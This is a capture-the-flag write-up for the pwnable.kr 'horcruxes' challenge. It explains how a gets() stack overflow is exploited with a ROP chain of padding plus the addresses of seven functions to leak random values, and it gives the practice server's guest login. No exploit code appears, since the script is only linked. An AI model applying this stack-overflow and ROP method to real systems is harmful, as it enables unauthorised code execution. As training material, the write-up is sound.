# 21 - horcruxes

## The Challenge

Voldemort concealed his splitted soul inside 7 horcruxes. Find all horcruxes, and ROP it!

author: jiwon choi

ssh <horcruxes@pwnable.kr> -p2222 (pw:guest)

## The Solution

Lets Examine the program first.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIG9ZT0-zYl2wMBZbnk%2F-MIJIDTqAvgcdW9cDgEi%2Fimage.png?alt=media\&token=203c9e66-4e83-45ee-8b84-e89069eb409b)

It asks us to select a number from the menu and then how much XP did we earn. Not very informative. We copied the binary to our machine and disassembled it. This is main:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIG9ZT0-zYl2wMBZbnk%2F-MIJJ-EHK1EuTGm6iBHF%2Fimage.png?alt=media\&token=2b3022ae-0e2f-4af9-b7d1-867bc113a616)

1. An alarm is set to throw us out after 60 seconds
2. The message about Voldemort is printed
3. `init_ABCDEFG` is called
4. Some security rules are set \[probably to prevent us from corrupting the machine once we achieve code execution]
5. `ropme` is called

Let's take a look at `init_ABCDEFG`:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIG9ZT0-zYl2wMBZbnk%2F-MIJKGG4LAzYb4LE-k8t%2Fimage.png?alt=media\&token=fc76194a-f0fa-43aa-8b83-6df641e32fd2)

Seven integers named 'a' to 'g' are set to a random int. Their sum is saved in 'sum'. These variables have a global scope. Let's take a look at `ropme`:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIJsUWHQ2g_Iw5C8-6j%2F-MIJtc_YFF4Xe8wuCUPm%2Fimage.png?alt=media\&token=81a2c910-ddec-456b-a3a1-305b323f3374)

The functions 'A' - 'G' print the values of the variables mentioned above. The EXP input uses `gets` which is great news, this is where we're going to ROP.

But wait, can't we just redirect the function to print the flag?

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIJsUWHQ2g_Iw5C8-6j%2F-MIJuy_IThMKpVIBYyaV%2Fimage.png?alt=media\&token=2b012fc3-8775-4344-8d45-0d2189ad4045)

All of the addresses in `ropme` contain `0a`. Once `puts` receives  `\n` it halts, which means we can't jump to any position within `ropme`.

We created a ROP chain that jumps from `A` to `G` one after the other. It contains:

1. 120 character buffer that overrides the stack up to `ebp` \[included].
2. The addresses of all of the functions `A` to `G`. Finding the addresses is easy with a disassembler. They are concatenated to each other as none of these functions require parameters.
3. The address where `ropme` is called \[since we can't resume execution within ropme].

Now we can obtain `a` to `g` and calculate their sum \[with modulus in case the sum surpasses MAX or MIN int].

To get a better understanding check out our [script](https://github.com/nickbhe/CTFWriteups/blob/master/pwnable.kr/21-horcruxes/horcruxes.py).